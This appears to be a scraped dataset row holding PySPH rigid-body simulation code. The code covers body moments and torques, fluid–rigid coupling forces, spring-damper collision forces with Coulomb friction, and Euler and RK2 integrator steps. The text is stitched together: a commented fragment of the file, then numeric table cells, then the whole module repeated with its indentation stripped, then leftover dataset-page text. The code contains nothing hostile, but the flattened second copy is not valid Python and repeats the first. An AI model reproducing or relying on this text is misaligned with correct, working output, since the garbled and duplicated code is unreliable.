                (d_tang_velocity_x[d_idx]**2) + (d_tang_velocity_y[d_idx]**2) +
                (d_tang_velocity_z[d_idx]**2))**(1. / 2.)
            # tangential unit vector (zero when no tangential motion)
            tij_x = 0
            tij_y = 0
            tij_z = 0
            if _tang > 0:
                tij_x = d_tang_velocity_x[d_idx] / _tang
                tij_y = d_tang_velocity_y[d_idx] / _tang
                tij_z = d_tang_velocity_z[d_idx] / _tang
            # damping force or dissipation
            ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
            ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
            ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
            # tangential spring force from the accumulated displacement
            ft_x_s = -self.kt * d_tang_disp_x[d_idx]
            ft_y_s = -self.kt * d_tang_disp_y[d_idx]
            ft_z_s = -self.kt * d_tang_disp_z[d_idx]
            ft_x = ft_x_d + ft_x_s
            ft_y = ft_y_d + ft_y_s
            ft_z = ft_z_d + ft_z_s
            # coulomb law: cap the tangential force at mu * |fn|
            ftij = ((ft_x**2) + (ft_y**2) + (ft_z**2))**(1. / 2.)
            fnij = ((fn_x**2) + (fn_y**2) + (fn_z**2))**(1. / 2.)
            _fnij = self.mu * fnij
            if _fnij < ftij:
                ft_x = -_fnij * tij_x
                ft_y = -_fnij * tij_y
                ft_z = -_fnij * tij_z
            d_fx[d_idx] += fn_x + ft_x
            d_fy[d_idx] += fn_y + ft_y
            d_fz[d_idx] += fn_z + ft_z
        else:
            # No contact: reset the tangential history for this particle.
            d_tang_velocity_x[d_idx] = 0
            d_tang_velocity_y[d_idx] = 0
            d_tang_velocity_z[d_idx] = 0
            d_tang_disp_x[d_idx] = 0
            d_tang_disp_y[d_idx] = 0
            d_tang_disp_z[d_idx] = 0
class EulerStepRigidBody(IntegratorStep):
    """Fast but inaccurate (first-order Euler) integrator for rigid
    bodies. Use this for testing."""
    def initialize(self):
        pass
    def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z,
               d_omega, d_omega_dot, d_vc, d_ac, d_num_body,
               dt=0.0):
        _i = declare('int')
        _j = declare('int')
        base = declare('int')
        # Per-body state (vc, omega) is advanced exactly once, by the
        # particle with index 0.
        if d_idx == 0:
            for _i in range(d_num_body[0]):
                base = 3*_i
                for _j in range(3):
                    d_vc[base + _j] += d_ac[base + _j]*dt
                    d_omega[base + _j] += d_omega_dot[base + _j]*dt
        # Every particle advances its own position.
        d_x[d_idx] += dt*d_u[d_idx]
        d_y[d_idx] += dt*d_v[d_idx]
        d_z[d_idx] += dt*d_w[d_idx]
class RK2StepRigidBody(IntegratorStep):
    """Two-stage (midpoint) Runge-Kutta integrator for rigid bodies.

    ``initialize`` snapshots the state at the start of the step; stage1
    advances by dt/2, stage2 advances the *saved* state by a full dt
    using the midpoint derivatives.
    """
    def initialize(self, d_idx, d_x, d_y, d_z, d_x0, d_y0, d_z0,
                   d_omega, d_omega0, d_vc, d_vc0, d_num_body):
        _i = declare('int')
        _j = declare('int')
        base = declare('int')
        # Snapshot per-body state once (particle 0 only).
        if d_idx == 0:
            for _i in range(d_num_body[0]):
                base = 3*_i
                for _j in range(3):
                    d_vc0[base + _j] = d_vc[base + _j]
                    d_omega0[base + _j] = d_omega[base + _j]
        # Snapshot each particle's position.
        d_x0[d_idx] = d_x[d_idx]
        d_y0[d_idx] = d_y[d_idx]
        d_z0[d_idx] = d_z[d_idx]
    def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
               d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
               dt=0.0):
        # Half step: advance from the snapshot by dt/2.
        dtb2 = 0.5*dt
        _i = declare('int')
        j = declare('int')
        base = declare('int')
        if d_idx == 0:
            for _i in range(d_num_body[0]):
                base = 3*_i
                for j in range(3):
                    d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dtb2
                    d_omega[base + j] = (d_omega0[base + j] +
                                         d_omega_dot[base + j]*dtb2)
        d_x[d_idx] = d_x0[d_idx] + dtb2*d_u[d_idx]
        d_y[d_idx] = d_y0[d_idx] + dtb2*d_v[d_idx]
        d_z[d_idx] = d_z0[d_idx] + dtb2*d_w[d_idx]
    def stage2(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
               d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
               dt=0.0):
        # Full step: advance from the snapshot by dt with the midpoint
        # derivatives computed after stage1.
        _i = declare('int')
        j = declare('int')
        base = declare('int')
        if d_idx == 0:
            for _i in range(d_num_body[0]):
                base = 3*_i
                for j in range(3):
                    d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dt
                    d_omega[base + j] = (d_omega0[base + j] +
                                         d_omega_dot[base + j]*dt)
        d_x[d_idx] = d_x0[d_idx] + dt*d_u[d_idx]
        d_y[d_idx] = d_y0[d_idx] + dt*d_v[d_idx]
        d_z[d_idx] = d_z0[d_idx] + dt*d_w[d_idx]
| 34.666667 | 79 | 0.531877 |
from pysph.base.reduce_array import parallel_reduce_array
from pysph.sph.equation import Equation
from pysph.sph.integrator_step import IntegratorStep
import numpy as np
import numpy
from math import sqrt
def skew(vec):
import sympy as S
x, y, z = vec[0], vec[1], vec[2]
return S.Matrix([[0, -z, y], [z, 0, -x], [-y, x, 0]])
def get_alpha_dot():
import sympy as S
ixx, iyy, izz, ixy, ixz, iyz = S.symbols("ixx, iyy, izz, ixy, ixz, iyz")
tx, ty, tz = S.symbols("tx, ty, tz")
wx, wy, wz = S.symbols('wx, wy, wz')
tau = S.Matrix([tx, ty, tz])
I = S.Matrix([[ixx, ixy, ixz], [ixy, iyy, iyz], [ixz, iyz, izz]])
w = S.Matrix([wx, wy, wz])
Iinv = I.inv()
Iinv.simplify()
res = Iinv*(tau - w.cross(I*w))
res.simplify()
syms, result = S.cse(res, symbols=S.numbered_symbols('tmp'))
for lhs, rhs in syms:
print("%s = %s" % (lhs, rhs))
for i in range(3):
print("omega_dot[%d] =" % i, result[0][i])
def get_torque():
import sympy as S
x, y, z, fx, fy, fz = S.symbols("x, y, z, fx, fy, fz")
R = S.Matrix([x, y, z])
F = S.Matrix([fx, fy, fz])
print("Torque:", R.cross(F))
cx, cy, cz = S.symbols('cx, cy, cz')
d = S.Matrix([cx, cy, cz])
print("c_m x f = ", d.cross(F))
wx, wy, wz = S.symbols('wx, wy, wz')
rx, ry, rz = S.symbols('rx, ry, rz')
w = S.Matrix([wx, wy, wz])
r = S.Matrix([rx, ry, rz])
print("w x r = %s" % w.cross(r))
def declare(*args): pass
class RigidBodyMoments(Equation):
def reduce(self, dst, t, dt):
nbody = declare('int')
i = declare('int')
base_mi = declare('int')
base = declare('int')
nbody = dst.num_body[0]
if dst.gpu:
dst.gpu.pull('omega', 'x', 'y', 'z', 'fx', 'fy', 'fz')
d_mi = declare('object')
m = declare('object')
x = declare('object')
y = declare('object')
z = declare('object')
fx = declare('object')
fy = declare('object')
fz = declare('object')
d_mi = dst.mi
cond = declare('object')
for i in range(nbody):
cond = dst.body_id == i
base = i*16
m = dst.m[cond]
x = dst.x[cond]
y = dst.y[cond]
z = dst.z[cond]
d_mi[base + 0] = numpy.sum(m)
d_mi[base + 1] = numpy.sum(m*x)
d_mi[base + 2] = numpy.sum(m*y)
d_mi[base + 3] = numpy.sum(m*z)
d_mi[base + 4] = numpy.sum(m*(y*y + z*z))
d_mi[base + 5] = numpy.sum(m*(x*x + z*z))
d_mi[base + 6] = numpy.sum(m*(x*x + y*y))
d_mi[base + 7] = -numpy.sum(m*x*y)
d_mi[base + 8] = -numpy.sum(m*x*z)
d_mi[base + 9] = -numpy.sum(m*y*z)
fx = dst.fx[cond]
fy = dst.fy[cond]
fz = dst.fz[cond]
d_mi[base + 10] = numpy.sum(fx)
d_mi[base + 11] = numpy.sum(fy)
d_mi[base + 12] = numpy.sum(fz)
d_mi[base + 13] = numpy.sum(y*fz - z*fy)
d_mi[base + 14] = numpy.sum(z*fx - x*fz)
d_mi[base + 15] = numpy.sum(x*fy - y*fx)
d_mi[:] = parallel_reduce_array(dst.mi)
for i in range(nbody):
base_mi = i*16
base = i*3
m = d_mi[base_mi + 0]
dst.total_mass[i] = m
cx = d_mi[base_mi + 1]/m
cy = d_mi[base_mi + 2]/m
cz = d_mi[base_mi + 3]/m
dst.cm[base + 0] = cx
dst.cm[base + 1] = cy
dst.cm[base + 2] = cz
ixx = d_mi[base_mi + 4] - (cy*cy + cz*cz)*m
iyy = d_mi[base_mi + 5] - (cx*cx + cz*cz)*m
izz = d_mi[base_mi + 6] - (cx*cx + cy*cy)*m
ixy = d_mi[base_mi + 7] + cx*cy*m
ixz = d_mi[base_mi + 8] + cx*cz*m
iyz = d_mi[base_mi + 9] + cy*cz*m
d_mi[base_mi + 0] = ixx
d_mi[base_mi + 1] = ixy
d_mi[base_mi + 2] = ixz
d_mi[base_mi + 3] = ixy
d_mi[base_mi + 4] = iyy
d_mi[base_mi + 5] = iyz
d_mi[base_mi + 6] = ixz
d_mi[base_mi + 7] = iyz
d_mi[base_mi + 8] = izz
fx = d_mi[base_mi + 10]
fy = d_mi[base_mi + 11]
fz = d_mi[base_mi + 12]
dst.force[base + 0] = fx
dst.force[base + 1] = fy
dst.force[base + 2] = fz
dst.ac[base + 0] = fx/m
dst.ac[base + 1] = fy/m
dst.ac[base + 2] = fz/m
tx = d_mi[base_mi + 13]
ty = d_mi[base_mi + 14]
tz = d_mi[base_mi + 15]
tx -= cy*fz - cz*fy
ty -= -cx*fz + cz*fx
tz -= cx*fy - cy*fx
dst.torque[base + 0] = tx
dst.torque[base + 1] = ty
dst.torque[base + 2] = tz
wx = dst.omega[base + 0]
wy = dst.omega[base + 1]
wz = dst.omega[base + 2]
tmp0 = iyz**2
tmp1 = ixy**2
tmp2 = ixz**2
tmp3 = ixx*iyy
tmp4 = ixy*ixz
tmp5 = 1./(ixx*tmp0 + iyy*tmp2 - 2*iyz*tmp4 + izz*tmp1 - izz*tmp3)
tmp6 = ixy*izz - ixz*iyz
tmp7 = ixz*wx + iyz*wy + izz*wz
tmp8 = ixx*wx + ixy*wy + ixz*wz
tmp9 = tmp7*wx - tmp8*wz + ty
tmp10 = ixy*iyz - ixz*iyy
tmp11 = ixy*wx + iyy*wy + iyz*wz
tmp12 = -tmp11*wx + tmp8*wy + tz
tmp13 = tmp11*wz - tmp7*wy + tx
tmp14 = ixx*iyz - tmp4
dst.omega_dot[base + 0] = tmp5*(-tmp10*tmp12 -
tmp13*(iyy*izz - tmp0) + tmp6*tmp9)
dst.omega_dot[base + 1] = tmp5*(tmp12*tmp14 +
tmp13*tmp6 - tmp9*(ixx*izz - tmp2))
dst.omega_dot[base + 2] = tmp5*(-tmp10*tmp13 -
tmp12*(-tmp1 + tmp3) + tmp14*tmp9)
if dst.gpu:
dst.gpu.push(
'total_mass', 'mi', 'cm', 'force', 'ac', 'torque',
'omega_dot'
)
class RigidBodyMotion(Equation):
def initialize(self, d_idx, d_x, d_y, d_z, d_u, d_v, d_w,
d_cm, d_vc, d_ac, d_omega, d_body_id):
base = declare('int')
base = d_body_id[d_idx]*3
wx = d_omega[base + 0]
wy = d_omega[base + 1]
wz = d_omega[base + 2]
rx = d_x[d_idx] - d_cm[base + 0]
ry = d_y[d_idx] - d_cm[base + 1]
rz = d_z[d_idx] - d_cm[base + 2]
d_u[d_idx] = d_vc[base + 0] + wy*rz - wz*ry
d_v[d_idx] = d_vc[base + 1] + wz*rx - wx*rz
d_w[d_idx] = d_vc[base + 2] + wx*ry - wy*rx
class BodyForce(Equation):
def __init__(self, dest, sources, gx=0.0, gy=0.0, gz=0.0):
self.gx = gx
self.gy = gy
self.gz = gz
super(BodyForce, self).__init__(dest, sources)
def initialize(self, d_idx, d_m, d_fx, d_fy, d_fz, d_num_body, d_mi):
d_fx[d_idx] = d_m[d_idx]*self.gx
d_fy[d_idx] = d_m[d_idx]*self.gy
d_fz[d_idx] = d_m[d_idx]*self.gz
class SummationDensityBoundary(Equation):
def __init__(self, dest, sources, fluid_rho=1000.0):
self.fluid_rho = fluid_rho
super(SummationDensityBoundary, self).__init__(dest, sources)
def loop(self, d_idx, d_rho, s_idx, s_m, s_V, WIJ):
d_rho[d_idx] += self.fluid_rho * s_V[s_idx] * WIJ
class NumberDensity(Equation):
def initialize(self, d_idx, d_V):
d_V[d_idx] = 0.0
def loop(self, d_idx, d_V, WIJ):
d_V[d_idx] += WIJ
class SummationDensityRigidBody(Equation):
def __init__(self, dest, sources, rho0):
self.rho0 = rho0
super(SummationDensityRigidBody, self).__init__(dest, sources)
def initialize(self, d_idx, d_rho):
d_rho[d_idx] = 0.0
def loop(self, d_idx, d_rho, s_idx, s_V, WIJ):
d_rho[d_idx] += self.rho0/s_V[s_idx]*WIJ
class ViscosityRigidBody(Equation):
def __init__(self, dest, sources, rho0, nu):
self.nu = nu
self.rho0 = rho0
super(ViscosityRigidBody, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_au, d_av, d_aw, d_rho,
s_idx, s_V, s_fx, s_fy, s_fz,
EPS, VIJ, XIJ, R2IJ, DWIJ):
phi_b = self.rho0/(s_V[s_idx]*d_rho[d_idx])
vijdotxij = min(VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2], 0.0)
fac = self.nu*phi_b*vijdotxij/(R2IJ + EPS)
ax = fac*DWIJ[0]
ay = fac*DWIJ[1]
az = fac*DWIJ[2]
d_au[d_idx] += ax
d_av[d_idx] += ay
d_aw[d_idx] += az
s_fx[s_idx] += -d_m[d_idx]*ax
s_fy[s_idx] += -d_m[d_idx]*ay
s_fz[s_idx] += -d_m[d_idx]*az
class PressureRigidBody(Equation):
def __init__(self, dest, sources, rho0):
self.rho0 = rho0
super(PressureRigidBody, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ):
rho1 = 1.0/d_rho[d_idx]
fac = -d_p[d_idx]*rho1*rho1*self.rho0/s_V[s_idx]
ax = fac*DWIJ[0]
ay = fac*DWIJ[1]
az = fac*DWIJ[2]
d_au[d_idx] += ax
d_av[d_idx] += ay
d_aw[d_idx] += az
s_fx[s_idx] += -d_m[d_idx]*ax
s_fy[s_idx] += -d_m[d_idx]*ay
s_fz[s_idx] += -d_m[d_idx]*az
class AkinciRigidFluidCoupling(Equation):
def __init__(self, dest, sources, fluid_rho=1000):
super(AkinciRigidFluidCoupling, self).__init__(dest, sources)
self.fluid_rho = fluid_rho
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
psi = s_V[s_idx] * self.fluid_rho
_t1 = 2 * d_p[d_idx] / (d_rho[d_idx]**2)
d_au[d_idx] += -psi * _t1 * DWIJ[0]
d_av[d_idx] += -psi * _t1 * DWIJ[1]
d_aw[d_idx] += -psi * _t1 * DWIJ[2]
s_fx[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[0]
s_fy[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[1]
s_fz[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[2]
class LiuFluidForce(Equation):
def __init__(self, dest, sources):
super(LiuFluidForce, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
_t1 = s_p[s_idx] / (s_rho[s_idx]**2) + d_p[d_idx] / (d_rho[d_idx]**2)
d_au[d_idx] += -s_m[s_idx] * _t1 * DWIJ[0]
d_av[d_idx] += -s_m[s_idx] * _t1 * DWIJ[1]
d_aw[d_idx] += -s_m[s_idx] * _t1 * DWIJ[2]
s_fx[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[0]
s_fy[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[1]
s_fz[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[2]
class RigidBodyForceGPUGems(Equation):
def __init__(self, dest, sources, k=1.0, d=1.0, eta=1.0, kt=1.0):
self.k = k
self.d = d
self.eta = eta
self.kt = kt
super(RigidBodyForceGPUGems, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, XIJ,
RIJ, R2IJ, VIJ):
vijdotrij = VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2]
if RIJ > 1e-9:
vijdotrij_r2ij = vijdotrij/R2IJ
nij_x = XIJ[0]/RIJ
nij_y = XIJ[1]/RIJ
nij_z = XIJ[2]/RIJ
else:
vijdotrij_r2ij = 0.0
nij_x = 0.0
nij_y = 0.0
nij_z = 0.0
vijt_x = VIJ[0] - vijdotrij_r2ij*XIJ[0]
vijt_y = VIJ[1] - vijdotrij_r2ij*XIJ[1]
vijt_z = VIJ[2] - vijdotrij_r2ij*XIJ[2]
d = self.d*d_h[d_idx]
fac = self.k*d_total_mass[0]/d*max(d - RIJ, 0.0)
d_fx[d_idx] += fac*nij_x - self.eta*VIJ[0] - self.kt*vijt_x
d_fy[d_idx] += fac*nij_y - self.eta*VIJ[1] - self.kt*vijt_y
d_fz[d_idx] += fac*nij_z - self.eta*VIJ[2] - self.kt*vijt_z
class RigidBodyCollision(Equation):
def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
self.kn = kn
self.kt = 2. / 7. * kn
m_eff = np.pi * 0.5**2 * 1e-6 * 2120
self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
np.sqrt(np.pi**2 + np.log(en)**2))
self.gamma_t = 0.5 * self.gamma_n
self.mu = mu
super(RigidBodyCollision, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
d_tang_velocity_y, d_tang_velocity_z, s_idx, s_rad_s, XIJ, RIJ,
R2IJ, VIJ):
overlap = 0
if RIJ > 1e-9:
overlap = d_rad_s[d_idx] + s_rad_s[s_idx] - RIJ
if overlap > 0:
nij_x = -XIJ[0] / RIJ
nij_y = -XIJ[1] / RIJ
nij_z = -XIJ[2] / RIJ
vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
vijn_x = vijdotnij * nij_x
vijn_y = vijdotnij * nij_y
vijn_z = vijdotnij * nij_z
fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
dtvx = d_tang_velocity_x[d_idx]
dtvy = d_tang_velocity_y[d_idx]
dtvz = d_tang_velocity_z[d_idx]
_tang = sqrt(dtvx*dtvx + dtvy*dtvy + dtvz*dtvz)
tij_x = 0
tij_y = 0
tij_z = 0
if _tang > 0:
tij_x = d_tang_velocity_x[d_idx] / _tang
tij_y = d_tang_velocity_y[d_idx] / _tang
tij_z = d_tang_velocity_z[d_idx] / _tang
ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
ft_x_s = -self.kt * d_tang_disp_x[d_idx]
ft_y_s = -self.kt * d_tang_disp_y[d_idx]
ft_z_s = -self.kt * d_tang_disp_z[d_idx]
ft_x = ft_x_d + ft_x_s
ft_y = ft_y_d + ft_y_s
ft_z = ft_z_d + ft_z_s
ftij = sqrt((ft_x**2) + (ft_y**2) + (ft_z**2))
fnij = sqrt((fn_x**2) + (fn_y**2) + (fn_z**2))
_fnij = self.mu * fnij
if _fnij < ftij:
ft_x = -_fnij * tij_x
ft_y = -_fnij * tij_y
ft_z = -_fnij * tij_z
d_fx[d_idx] += fn_x + ft_x
d_fy[d_idx] += fn_y + ft_y
d_fz[d_idx] += fn_z + ft_z
else:
d_tang_velocity_x[d_idx] = 0
d_tang_velocity_y[d_idx] = 0
d_tang_velocity_z[d_idx] = 0
d_tang_disp_x[d_idx] = 0
d_tang_disp_y[d_idx] = 0
d_tang_disp_z[d_idx] = 0
class RigidBodyWallCollision(Equation):
def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
self.kn = kn
self.kt = 2. / 7. * kn
m_eff = np.pi * 0.5**2 * 1e-6 * 2120
self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
np.sqrt(np.pi**2 + np.log(en)**2))
print(self.gamma_n)
self.gamma_t = 0.5 * self.gamma_n
self.mu = mu
super(RigidBodyWallCollision, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
d_tang_velocity_y, d_tang_velocity_z, s_idx, XIJ, RIJ,
R2IJ, VIJ, s_nx, s_ny, s_nz):
overlap = d_rad_s[d_idx] - (XIJ[0] * s_nx[s_idx] + XIJ[1] *
s_ny[s_idx] + XIJ[2] * s_nz[s_idx])
if overlap > 0:
nij_x = -s_nx[s_idx]
nij_y = -s_ny[s_idx]
nij_z = -s_nz[s_idx]
vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
vijn_x = vijdotnij * nij_x
vijn_y = vijdotnij * nij_y
vijn_z = vijdotnij * nij_z
fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
_tang = (
(d_tang_velocity_x[d_idx]**2) + (d_tang_velocity_y[d_idx]**2) +
(d_tang_velocity_z[d_idx]**2))**(1. / 2.)
tij_x = 0
tij_y = 0
tij_z = 0
if _tang > 0:
tij_x = d_tang_velocity_x[d_idx] / _tang
tij_y = d_tang_velocity_y[d_idx] / _tang
tij_z = d_tang_velocity_z[d_idx] / _tang
ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
ft_x_s = -self.kt * d_tang_disp_x[d_idx]
ft_y_s = -self.kt * d_tang_disp_y[d_idx]
ft_z_s = -self.kt * d_tang_disp_z[d_idx]
ft_x = ft_x_d + ft_x_s
ft_y = ft_y_d + ft_y_s
ft_z = ft_z_d + ft_z_s
ftij = ((ft_x**2) + (ft_y**2) + (ft_z**2))**(1. / 2.)
fnij = ((fn_x**2) + (fn_y**2) + (fn_z**2))**(1. / 2.)
_fnij = self.mu * fnij
if _fnij < ftij:
ft_x = -_fnij * tij_x
ft_y = -_fnij * tij_y
ft_z = -_fnij * tij_z
d_fx[d_idx] += fn_x + ft_x
d_fy[d_idx] += fn_y + ft_y
d_fz[d_idx] += fn_z + ft_z
else:
d_tang_velocity_x[d_idx] = 0
d_tang_velocity_y[d_idx] = 0
d_tang_velocity_z[d_idx] = 0
d_tang_disp_x[d_idx] = 0
d_tang_disp_y[d_idx] = 0
d_tang_disp_z[d_idx] = 0
class EulerStepRigidBody(IntegratorStep):
def initialize(self):
pass
def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z,
d_omega, d_omega_dot, d_vc, d_ac, d_num_body,
dt=0.0):
_i = declare('int')
_j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for _j in range(3):
d_vc[base + _j] += d_ac[base + _j]*dt
d_omega[base + _j] += d_omega_dot[base + _j]*dt
d_x[d_idx] += dt*d_u[d_idx]
d_y[d_idx] += dt*d_v[d_idx]
d_z[d_idx] += dt*d_w[d_idx]
class RK2StepRigidBody(IntegratorStep):
def initialize(self, d_idx, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega0, d_vc, d_vc0, d_num_body):
_i = declare('int')
_j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for _j in range(3):
d_vc0[base + _j] = d_vc[base + _j]
d_omega0[base + _j] = d_omega[base + _j]
d_x0[d_idx] = d_x[d_idx]
d_y0[d_idx] = d_y[d_idx]
d_z0[d_idx] = d_z[d_idx]
def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
dt=0.0):
dtb2 = 0.5*dt
_i = declare('int')
j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for j in range(3):
d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dtb2
d_omega[base + j] = (d_omega0[base + j] +
d_omega_dot[base + j]*dtb2)
d_x[d_idx] = d_x0[d_idx] + dtb2*d_u[d_idx]
d_y[d_idx] = d_y0[d_idx] + dtb2*d_v[d_idx]
d_z[d_idx] = d_z0[d_idx] + dtb2*d_w[d_idx]
def stage2(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
dt=0.0):
_i = declare('int')
j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for j in range(3):
d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dt
d_omega[base + j] = (d_omega0[base + j] +
d_omega_dot[base + j]*dt)
d_x[d_idx] = d_x0[d_idx] + dt*d_u[d_idx]
d_y[d_idx] = d_y0[d_idx] + dt*d_v[d_idx]
d_z[d_idx] = d_z0[d_idx] + dt*d_w[d_idx]
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.